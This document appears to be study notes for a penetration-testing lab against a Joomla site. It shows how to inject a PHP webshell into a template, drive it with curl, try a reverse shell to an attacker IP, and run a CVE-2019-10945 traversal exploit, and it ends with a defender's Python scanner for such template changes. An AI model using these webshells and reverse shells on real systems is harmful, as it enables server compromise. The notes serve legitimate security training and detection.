# Abusing Built-in Functionality

- After finding credentials for `admin` in the last section, we can log in to the target backend at `http://dev.inlanefreight.local/administrator`

![[images/Pasted image 20260119192341.png]]

- Note: If we receive an error stating `An error has occurred. Call to a member function format() on null` after logging in, navigate to `http://dev.inlanefreight.local/administrator/index.php?option=com_plugins` and disable the `Quick Icon - PHP Version Check` plugin
    - This will allow the control panel to display properly
- Once logged in as `admin`, we can add a snippet of PHP code to gain RCE by customizing a template
- Click `Templates` from the dashboard to show the templates menu

![[images/Pasted image 20260119192506.png]]

- From above, we can choose `protostar` under the `Template` column header to bring us to the `Templates: Customise` page

![[images/Pasted image 20260119192552.png]]

- From above, we can choose to edit `error.php`, add the below one-liner, and click `save & close`

```php
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);
```

![[images/Pasted image 20260119192713.png]]

- Now we can interact with the webshell using `cURL`

```bash
curl -s http://dev.inlanefreight.local/templates/protostar/error.php?dcfdd5e021a869fcc6dfaef8bf31377e=id
```

- We can choose to switch to a revshell if necessary to begin looking for privesc vectors

# Leveraging Known Vulns

- There have been at least [426](https://www.cvedetails.com/vulnerability-list/vendor_id-3496/Joomla.html) Joomla-related vulns associated with CVEs
- [CVE-2019-10945](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945) corresponds to a `joomla` core vuln in version 3.9.4
    - This is a directory traversal and authenticated file deletion vulnerability
- We can use [this](https://www.exploit-db.com/exploits/46710) exploit script to leverage the vulnerability and list the contents of the webroot and other directories
- The python3 version of this same script can be found
[here](https://github.com/dpgg101/CVE-2019-10945)
- Below is an example usage of `joomla_dir_trav.py` with `python2.7`

```bash
python2.7 joomla_dir_trav.py --url "http://dev.inlanefreight.local/administrator/" --username admin --password admin --dir /
```

# Exercise

## Initial Enum

- `ping` test

![[images/Pasted image 20260119193953.png]]

- `nmap` scans

![[images/Pasted image 20260119194022.png]]
![[images/Pasted image 20260119194033.png]]

- update `/etc/hosts`

![[images/Pasted image 20260119194142.png]]

- visit `dev.inlanefreight.local`

![[images/Pasted image 20260119194204.png]]

- even though we can tell based on the favicon above, confirm usage of `joomla`
- visit `robots.txt`

![[images/Pasted image 20260119194232.png]]

- use below `cURL` command to `grep` against page source

```bash
curl -s http://dev.inlanefreight.local/ | grep -i joomla
```

![[images/Pasted image 20260119194249.png]]

## Fingerprint Joomla Version

- Use below `cURL` commands
    - we are on `joomla` version 3.9.4

```bash
curl -s http://dev.inlanefreight.local/README.txt | head -n 5
```

![[images/Pasted image 20260119194309.png]]

```bash
curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -
```

![[images/Pasted image 20260119194359.png]]

## Enumerate Joomla Users

- Recheck password for `admin` using `joomla-brute.py`

![[images/Pasted image 20260119194504.png]]

## Login as admin

- use above creds

![[images/Pasted image 20260119194604.png]]

- we are getting the error mentioned in the note for this section

![[images/Pasted image 20260119194630.png]]

- visit `http://dev.inlanefreight.local/administrator/index.php?option=com_plugins`

![[images/Pasted image 20260119194723.png]]

- disable the `Quick Icon - PHP Version Check` plugin

![[images/Pasted image 20260119194741.png]]

- we have the admin dashboard

![[images/Pasted image 20260119194805.png]]

## Edit template with a revshell

- go to `Templates` and select the `protostar` template (not styles)
![[images/Pasted image 20260119194922.png]]

- after starting a listener on the Kali machine at port 800, edit `error.php` to include below revshell from [Online - Reverse Shell Generator](https://www.revshells.com/)

```php
php -r '$sock=fsockopen("10.10.15.123",8000);system("sh <&3 >&3 2>&3");'
```

- visit `/error.php` with below `cURL` command

```bash
curl -s http://dev.inlanefreight.local/templates/protostar/error.php
```

- connection is auto-closing - not sure what's wrong here

![[images/Pasted image 20260119195715.png]]

## Edit template with simple webshell

- try a simple webshell as below

```php
system($_GET['cmd']);
```

![[images/Pasted image 20260119195739.png]]

- now try to interact with webshell with below `cURL` command

```bash
curl -s http://dev.inlanefreight.local/templates/protostar/error.php?cmd=id
```

- we have a working webshell

![[images/Pasted image 20260119195901.png]]

- list current dir

![[images/Pasted image 20260119200008.png]]

- go up a level

![[images/Pasted image 20260119200014.png]]

- list `dev.inlanefreight.local`

![[images/Pasted image 20260119200040.png]]

- `cat` the flag
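
A defender's check for the template modification described in these notes, as an added example that is not part of the original notes: it scans PHP files under a Joomla `templates/` directory for command-execution calls fed directly by request superglobals, and for raw outbound sockets. It goes beyond the `system($_GET[...])` one-liner to cover other common sinks; the function names, rule labels and the sample tree are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that run OS commands or evaluate code (not exhaustive).
SINKS = r"\b(?:system|exec|shell_exec|passthru|popen|proc_open|eval|assert)"
# Superglobals an HTTP client controls.
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b"
# A sink call whose arguments reference a superglobal in the same statement.
DIRECT = re.compile(SINKS + r"\s*\([^;]*" + SOURCES, re.IGNORECASE)
# Raw outbound socket opened from template code.
SOCKET = re.compile(r"\bfsockopen\s*\(", re.IGNORECASE)

def scan_php(text):
    """Return (line_number, rule, line) findings for one PHP source string."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if DIRECT.search(line):
            findings.append((n, "request-to-exec", line.strip()))
        elif SOCKET.search(line):
            findings.append((n, "outbound-socket", line.strip()))
    return findings

def scan_templates(webroot):
    """Scan PHP files under <webroot>/templates; return {relative_path: findings}."""
    root = Path(webroot)
    results = {}
    for path in sorted((root / "templates").rglob("*.php")):
        hits = scan_php(path.read_text(errors="replace"))
        if hits:
            results[path.relative_to(root).as_posix()] = hits
    return results

def build_sample_webroot(base):
    """Constructed sample tree: a clean index.php and a modified error.php."""
    tpl = Path(base) / "templates" / "protostar"
    tpl.mkdir(parents=True)
    (tpl / "index.php").write_text("<?php\ndefined('_JEXEC') or die;\necho 'ok';\n")
    (tpl / "error.php").write_text("<?php\ndefined('_JEXEC') or die;\nsystem($_GET['cmd']);\n")
    return base

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for path, hits in scan_templates(build_sample_webroot(d)).items():
            for n, rule, line in hits:
                print(f"{path}:{n}: {rule}: {line}")
```

Pattern matching of this kind misses obfuscated code; comparing template files against hashes from a clean install of the same Joomla version catches any modification.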